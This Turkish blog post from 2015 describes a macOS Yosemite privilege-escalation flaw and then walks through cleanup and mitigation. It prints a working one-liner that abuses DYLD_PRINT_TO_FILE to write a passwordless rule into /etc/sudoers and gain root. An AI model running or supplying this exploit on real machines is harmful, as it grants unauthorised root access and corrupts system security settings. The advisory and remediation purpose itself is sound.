24 Temmuz 2015 Cuma




Aşağıda belirtmiş olduğum MacOsX’te bulunan yetki yükseltme zafiyeti, root haklarına sahip olmayan normal bir kullanıcı hesabı ile  root yetkilerine sahip olmasını sağlamakta,



echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su


Bu komut sonrasında sudoers dosyasında değişiklik yapılıyor ve root user'a erişim sağlanabiliyor fakat sudoers dosyasında değişiklik yapıldığı için tekrar root erişimini sağlamak istediğinizde “Syntax error” gibi bir hata ile karşılaşabilirsiniz ve dolayısıyla root erişimini terminalden çıktıktan sonra tekrar sağlayamayabilirsiniz.


(Twitter'dan alıntı)

Not: sudoers dosyasına erişim root erişimi için şifre sorma bu zafiyet ile devredışı bırakıldığından “sudo su” komutunu tekrar çalıştırdığınızda root şifresini sormadan direk root’a erişim de sağlayabilirsiniz, yani hata almayabilirsiniz.

Bu sorunu gidermek için root user’ı aktif etmeniz gerekmekte, bunun için


  • System Preferences
  • Users & Groups
  • Login Items
  • Sol altta yer alan Kilide tıklayarak kullanıcı şifrenizi girin




  • Sağ tarafta yer alan “Join” ‘e ve ardından açılan pencerede “Open Directory Utility” e tıklayın
  • 4.adımda bahsettiğimiz kilide tekrar tıklayarak şifrenizi girin
  • Edit menüsü altından “Enable root User” ı seçin




  • Root user için şifre tanımlayıp doğrulayın




  • Terminali açıp “ su – “ komutunu çalıştırın



  • 8. Adımda tanımladığımız şifreyi girerek root erişimini sağlayın
  • visudo” komutunu çalıştırarak “sudoers” dosyasını açın ve yukarıda girmiş olduğumuz komutu bulun. (Dosyanın sonunda “ALL ALL=(ALL) NOPASSWD: ALL” bu şekilde bulacaksınızdır)
  • Bu satırı silin ve dosyayı kaydedip çıkın (:wq)
Tekrar “sudo su” şeklinde denediğinizde hata almadan sorunsuz çalıştığını göreceksiniz. Root user’I devre dışı bırakmak için yukarıda bahsetmiş olduğum adımları tekrar uygulayıp 7. Adımdaki “Enable root User” yerine “Disable Root User” ı seçmeniz yeterli olacaktır.


Not: Daha kısa yol olarak terminalden “dsenableroot” komutunu yazıp kullanıcı şifreniz ardından root şifresi tanımlayıp tekrar doğrulamanız da yeterli olacaktır.

Bahsi geçen bu zafiyeti kapatmak için Apple OsX Yosemite (10.10.4) ve öncesi için henüz bir yama yayınlamadı fakat 10.11 beta1 de bu zafiyeti 1 ay önce kapatmıştı. Apple’ın yamasını beklemek istemiyorsanız aşağıdaki linkte verilen kernel extension’ı yükleyerek zafiyeti kapatabilirsiniz.

Not: Tüm sorumluluk kullanıcıya aittir.

Zafiyet ile ilgili 


linklerinden detaylı bilgi edinebilirsiniz.

0 yorum: